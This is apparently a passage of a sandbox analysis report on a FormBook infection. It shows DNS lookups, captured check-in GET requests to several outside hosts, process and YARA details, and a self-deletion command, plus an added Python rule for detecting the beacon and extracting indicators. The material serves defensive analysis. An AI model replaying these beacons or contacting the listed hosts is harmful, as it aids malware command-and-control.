This is benign noise rather than sample traffic. The guest sent the www.sanlifalan.com query twice from UDP port 62176 with the same transaction ID 0x470 (19:47:39.315 and, after a one-second resolver timeout, 19:47:40.339); both answers arrived (19:47:40.523 and 19:47:40.621), and by the time the second one did the resolver had consumed the first and closed the socket, so the guest replied with Port Unreachable. Snort SID 402 above is this packet.

                                                  DNS Queries

Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                         Type            Class
Oct 13, 2021 19:47:34.126564980 CEST  192.168.2.5  8.8.8.8  0xa732    Standard query (0)  www.ribbonofficial.com       A (IP address)  IN (0x0001)
Oct 13, 2021 19:47:39.315068960 CEST  192.168.2.5  8.8.8.8  0x470     Standard query (0)  www.sanlifalan.com           A (IP address)  IN (0x0001)
Oct 13, 2021 19:47:40.339004993 CEST  192.168.2.5  8.8.8.8  0x470     Standard query (0)  www.sanlifalan.com           A (IP address)  IN (0x0001)
Oct 13, 2021 19:47:45.876126051 CEST  192.168.2.5  8.8.8.8  0x72c7    Standard query (0)  www.floaterslaser.com        A (IP address)  IN (0x0001)
Oct 13, 2021 19:47:50.995863914 CEST  192.168.2.5  8.8.8.8  0xfc77    Standard query (0)  www.mambacustomboats.com     A (IP address)  IN (0x0001)
Oct 13, 2021 19:48:01.289443970 CEST  192.168.2.5  8.8.8.8  0x3eff    Standard query (0)  www.esyscoloradosprings.com  A (IP address)  IN (0x0001)
Oct 13, 2021 19:48:06.706549883 CEST  192.168.2.5  8.8.8.8  0xa9c5    Standard query (0)  www.begukiu0.info            A (IP address)  IN (0x0001)
Oct 13, 2021 19:48:12.124536991 CEST  192.168.2.5  8.8.8.8  0x6a9b    Standard query (0)  www.kangrungao.com           A (IP address)  IN (0x0001)

                                                  DNS Answers

Timestamp                             Source IP  Dest IP      Trans ID  Reply Code      Name                         CName                      Address          Type                    Class
Oct 13, 2021 19:47:34.165796995 CEST  8.8.8.8    192.168.2.5  0xa732    No error (0)    www.ribbonofficial.com       shops.myshopify.com                         CNAME (Canonical name)  IN (0x0001)
Oct 13, 2021 19:47:34.165796995 CEST  8.8.8.8    192.168.2.5  0xa732    No error (0)    shops.myshopify.com                                     23.227.38.74     A (IP address)          IN (0x0001)
Oct 13, 2021 19:47:40.522993088 CEST  8.8.8.8    192.168.2.5  0x470     No error (0)    www.sanlifalan.com                                      104.165.34.6     A (IP address)          IN (0x0001)
Oct 13, 2021 19:47:40.620671988 CEST  8.8.8.8    192.168.2.5  0x470     No error (0)    www.sanlifalan.com                                      104.165.34.6     A (IP address)          IN (0x0001)
Oct 13, 2021 19:47:45.900255919 CEST  8.8.8.8    192.168.2.5  0x72c7    No error (0)    www.floaterslaser.com        floaterslaser.com                           CNAME (Canonical name)  IN (0x0001)
Oct 13, 2021 19:47:45.900255919 CEST  8.8.8.8    192.168.2.5  0x72c7    No error (0)    floaterslaser.com                                       81.169.145.161   A (IP address)          IN (0x0001)
Oct 13, 2021 19:47:51.184072018 CEST  8.8.8.8    192.168.2.5  0xfc77    No error (0)    www.mambacustomboats.com                                64.190.62.111    A (IP address)          IN (0x0001)
Oct 13, 2021 19:48:01.419078112 CEST  8.8.8.8    192.168.2.5  0x3eff    No error (0)    www.esyscoloradosprings.com  websites076.homestead.com                   CNAME (Canonical name)  IN (0x0001)
Oct 13, 2021 19:48:01.419078112 CEST  8.8.8.8    192.168.2.5  0x3eff    No error (0)    websites076.homestead.com                               108.167.135.122  A (IP address)          IN (0x0001)
Oct 13, 2021 19:48:07.117193937 CEST  8.8.8.8    192.168.2.5  0xa9c5    Name error (3)  www.begukiu0.info            none                       none             A (IP address)          IN (0x0001)
Oct 13, 2021 19:48:12.523261070 CEST  8.8.8.8    192.168.2.5  0x6a9b    No error (0)    www.kangrungao.com           a.mb.cn                                     CNAME (Canonical name)  IN (0x0001)
Oct 13, 2021 19:48:12.523261070 CEST  8.8.8.8    192.168.2.5  0x6a9b    No error (0)    a.mb.cn                                                 8.212.24.67      A (IP address)          IN (0x0001)

Of the eight names the sample queried, one does not exist (www.begukiu0.info, NXDOMAIN) and three of the others are CNAMEs into shared hosting (Shopify, Homestead, a.mb.cn), so the addresses in the Snort alerts are shared infrastructure that also serves unrelated sites. Indicators from this capture should be the queried names, not the resolved IPs.

                                                  HTTP Request Dependency Graph

                                                  • www.ribbonofficial.com
                                                  • www.sanlifalan.com
                                                  • www.floaterslaser.com
                                                  • www.mambacustomboats.com
                                                  • www.esyscoloradosprings.com

                                                  HTTP Packets

Both sessions below are attributed to C:\Windows\explorer.exe rather than to divpCHa0h7.exe: the beacon runs from the process the sample injected into, so host-side detection has to key on network activity from explorer.exe, not from the original binary. Each request carries only Host and Connection: close (no User-Agent, no Accept), uses a short random-looking directory (/fqiq/) and two four-character query keys; the value of z0DH (f0Dtar1PYnAdDzS) is identical in both sessions while ZvEd differs, and both are followed by seven NUL bytes. The 403 from Shopify (session 0) and the stock GB2312 landing page from nginx (session 1) show that neither host answered as a C2 server. FormBook's configuration lists decoy domains alongside the real C2, so a non-C2 response neither confirms nor rules out a host, and none of the hosts contacted in this capture can be confirmed as the live C2 from the responses alone.

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.5  49767        23.227.38.74    80                C:\Windows\explorer.exe

Timestamp                             kBytes transferred  Direction  Data
Oct 13, 2021 19:47:34.197210073 CEST  5785                OUT        GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr HTTP/1.1
                                                  Host: www.ribbonofficial.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
Oct 13, 2021 19:47:34.244388103 CEST  5786                IN         HTTP/1.1 403 Forbidden
                                                  Date: Wed, 13 Oct 2021 17:47:34 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  X-Sorting-Hat-PodId: 216
                                                  X-Sorting-Hat-ShopId: 59389116584
                                                  X-Dc: gcp-europe-west1
                                                  X-Request-ID: cecbddb8-e852-4c90-927e-af3e5555f963
                                                  X-Content-Type-Options: nosniff
                                                  X-Permitted-Cross-Domain-Policies: none
                                                  X-XSS-Protection: 1; mode=block
                                                  X-Download-Options: noopen
                                                  CF-Cache-Status: DYNAMIC
                                                  Server: cloudflare
                                                  CF-RAY: 69da64d2c8f74303-FRA
                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                  Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 
7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c
                                                  Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col
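The traits of the check-in request (short directory, two four-character keys with base64-like values, no User-Agent or Accept, Connection: close) are easy to turn into a log-side rule and into a cross-session IOC extractor. The following is an added example, not the sandbox's code and not the ET signatures that fired in the Snort table: it is a heuristic approximation of what is visible in the captured requests. The two captured requests from sessions 0 and 1 are embedded as input, with the seven trailing NUL bytes omitted, alongside a constructed browser request whose URL has a similar shape, to show that the rule keys on the missing User-Agent and the query structure together rather than on the path alone.

```python
"""Heuristic for FormBook-style check-in GETs (added example; neither the
sandbox's code nor the ET signatures, only an approximation of the traits in
the captured requests). Input is raw HTTP/1.x request text as carved from a
pcap or proxy log."""
import re
from collections import defaultdict

# Request line as seen in the capture: one short lowercase directory, a
# trailing slash and a query string. HTTP/1.0 is accepted as well.
REQ_LINE = re.compile(r"^GET (/[a-z0-9]{2,8}/)\?([^ ]+) HTTP/1\.[01]$")
PARAM_KEY = re.compile(r"^[A-Za-z0-9]{4}$")
PARAM_VAL = re.compile(r"^[A-Za-z0-9+/=_-]{12,}$")


def parse_http_request(raw):
    """Split a request into (request line, lower-cased header dict, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def query_params(query):
    """Parse k=v&k=v without URL-decoding, so '+' in base64-like values survives."""
    return [tuple(p.partition("=")[::2]) for p in query.split("&") if p]


def checkin_indicators(raw):
    """Traits of the captured check-ins that a request exhibits, as strings."""
    req_line, headers, _ = parse_http_request(raw)
    m = REQ_LINE.match(req_line)
    if not m:
        return []
    hits = []
    params = query_params(m.group(2))
    if len(params) == 2 and all(PARAM_KEY.match(k) and PARAM_VAL.match(v) for k, v in params):
        hits.append("uri: short directory, two 4-char keys with base64-like values")
    if "user-agent" not in headers:
        hits.append("no User-Agent")
    if "accept" not in headers:
        hits.append("no Accept")
    if headers.get("connection", "").lower() == "close":
        hits.append("Connection: close")
    return hits


def is_formbook_checkin(raw):
    """Flag only on the URI shape together with a missing User-Agent, so a
    browser fetching a similar-looking URL does not trip the rule."""
    hits = checkin_indicators(raw)
    return any(h.startswith("uri:") for h in hits) and "no User-Agent" in hits


def params_shared_across_hosts(raws):
    """(key, value) pairs sent unchanged to more than one Host. A value that
    does not vary with the destination comes from the victim or the build, not
    from per-request randomness, which makes it a usable capture-specific IOC."""
    seen = defaultdict(set)
    for raw in raws:
        req_line, headers, _ = parse_http_request(raw)
        m = REQ_LINE.match(req_line)
        if m:
            for k, v in query_params(m.group(2)):
                seen[(k, v)].add(headers.get("host", ""))
    return {kv: hosts for kv, hosts in seen.items() if len(hosts) > 1}


# The two requests from sessions 0 and 1 of this report (trailing NUL bytes
# omitted) plus one constructed browser request for contrast.
CAPTURED = [
    "GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr HTTP/1.1\r\n"
    "Host: www.ribbonofficial.com\r\nConnection: close\r\n\r\n",
    "GET /fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS HTTP/1.1\r\n"
    "Host: www.sanlifalan.com\r\nConnection: close\r\n\r\n",
]
BROWSER = ("GET /shop/?ref=newsletter HTTP/1.1\r\nHost: www.example.com\r\n"
           "User-Agent: Mozilla/5.0\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n")

if __name__ == "__main__":
    for raw in CAPTURED + [BROWSER]:
        print(is_formbook_checkin(raw), checkin_indicators(raw))
    print(params_shared_across_hosts(CAPTURED))
```

Run over the two captured requests, `params_shared_across_hosts` returns exactly one pair, `("z0DH", "f0Dtar1PYnAdDzS")`, seen against both hosts; that is the value to pivot on in other captures from the same infection, whereas the ZvEd values change per request and are useless as indicators. The rule deliberately requires both the URI shape and the absent User-Agent, because either trait alone matches ordinary traffic (embedded HTTP clients without a User-Agent, CDN URLs with short opaque directories).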


Session ID: 1
Source IP: 192.168.2.5
Source Port: 49768
Destination IP: 104.165.34.6
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Oct 13, 2021 19:47:40.694370031 CEST, kBytes transferred: 5793, Direction: OUT
Data:
GET /fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS HTTP/1.1
Host: www.sanlifalan.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Oct 13, 2021 19:47:40.867327929 CEST, kBytes transferred: 5793, Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 13 Oct 2021 17:47:40 GMT
Content-Type: text/html
Content-Length: 781
Connection: close
                                                  Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>


Session ID: 2
Source IP: 192.168.2.5
Source Port: 49769
Destination IP: 81.169.145.161
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Oct 13, 2021 19:47:45.919836998 CEST, kBytes transferred: 5794, Direction: OUT
Data:
GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l HTTP/1.1
Host: www.floaterslaser.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Oct 13, 2021 19:47:45.938915014 CEST, kBytes transferred: 5795, Direction: IN
Data:
HTTP/1.1 404 Not Found
Date: Wed, 13 Oct 2021 17:47:45 GMT
Server: Apache/2.4.51 (Unix)
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID: 3
Source IP: 192.168.2.5
Source Port: 49773
Destination IP: 64.190.62.111
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Oct 13, 2021 19:47:51.203907013 CEST, kBytes transferred: 5807, Direction: OUT
Data:
GET /fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS HTTP/1.1
Host: www.mambacustomboats.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Oct 13, 2021 19:47:51.249383926 CEST, kBytes transferred: 5809, Direction: IN
Data:
HTTP/1.1 302 Found
date: Wed, 13 Oct 2021 17:47:51 GMT
content-type: text/html; charset=UTF-8
content-length: 0
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_0iebMnn85rGPdDqIEJxeNy8gIbO6CRs7ZDHqhQVvU/PQfR/eAFVjJYiSzo9U0xPuetoM72JXq2vZLu3MQDBEFQ==
expires: Mon, 26 Jul 1997 05:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
last-modified: Wed, 13 Oct 2021 17:47:51 GMT
location: https://sedo.com/search/details/?partnerid=324561&language=e&domain=mambacustomboats.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
x-cache-miss-from: parking-f666569bc-lfcv4
server: NginX
connection: close


Session ID: 4
Source IP: 192.168.2.5
Source Port: 49789
Destination IP: 108.167.135.122
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: Oct 13, 2021 19:48:01.554976940 CEST, kBytes transferred: 5851, Direction: OUT
Data:
GET /fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS HTTP/1.1
Host: www.esyscoloradosprings.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Oct 13, 2021 19:48:01.689186096 CEST, kBytes transferred: 5852, Direction: IN
Data:
HTTP/1.1 503 Service Unavailable
Content-Type: text/html; charset=UTF-8
Content-Length: 884
Connection: close
P3P: CP="CAO PSA OUR"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
                                                  Data Ascii: <html><head><title>Virus/Spyware Download Blocked</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"><meta name="viewport" content="initial-scale=1.0"><style> #content { border:3px solid#aaa; background-color:#fff; margin:1.5em; padding:1.5em; font-family:Tahoma,Helvetica,Arial,sans-serif; font-size:1em; } h1 { font-size:1.3em; font-weight:bold; color:#196390; } b { font-weight:normal; color:#196390; }</style></head><body bgcolor="#e7e8e9"><div id="content"><h1>Virus/Spyware Download Blocked</h1><p>Download of the virus/spyware has been blocked in accordance with company policy. Please contact your system administrator if you believe this is in error.</p><p><b>File name:</b> </p></div></body></html>


                                                  Code Manipulations

                                                  Statistics

                                                  Behavior


                                                  System Behavior

                                                  General

                                                  Start time:19:45:59
                                                  Start date:13/10/2021
                                                  Path:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\Desktop\divpCHa0h7.exe'
                                                  Imagebase:0x690000
                                                  File size:477696 bytes
                                                  MD5 hash:FDA0D823B262AC2B1BD76A2053C29692
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  General

                                                  Start time:19:46:08
                                                  Start date:13/10/2021
                                                  Path:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Imagebase:0x140000
                                                  File size:477696 bytes
                                                  MD5 hash:FDA0D823B262AC2B1BD76A2053C29692
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  General

                                                  Start time:19:46:08
                                                  Start date:13/10/2021
                                                  Path:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Imagebase:0x3a0000
                                                  File size:477696 bytes
                                                  MD5 hash:FDA0D823B262AC2B1BD76A2053C29692
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  General

                                                  Start time:19:46:09
                                                  Start date:13/10/2021
                                                  Path:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Imagebase:0x400000
                                                  File size:477696 bytes
                                                  MD5 hash:FDA0D823B262AC2B1BD76A2053C29692
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  General

                                                  Start time:19:46:10
                                                  Start date:13/10/2021
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0x7ff693d90000
                                                  File size:3933184 bytes
                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  General

                                                  Start time:19:46:52
                                                  Start date:13/10/2021
                                                  Path:C:\Windows\SysWOW64\msdt.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\msdt.exe
                                                  Imagebase:0x2f0000
                                                  File size:1508352 bytes
                                                  MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:moderate

                                                  General

                                                  Start time:19:46:55
                                                  Start date:13/10/2021
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:/c del 'C:\Users\user\Desktop\divpCHa0h7.exe'
                                                  Imagebase:0x150000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:19:46:56
                                                  Start date:13/10/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
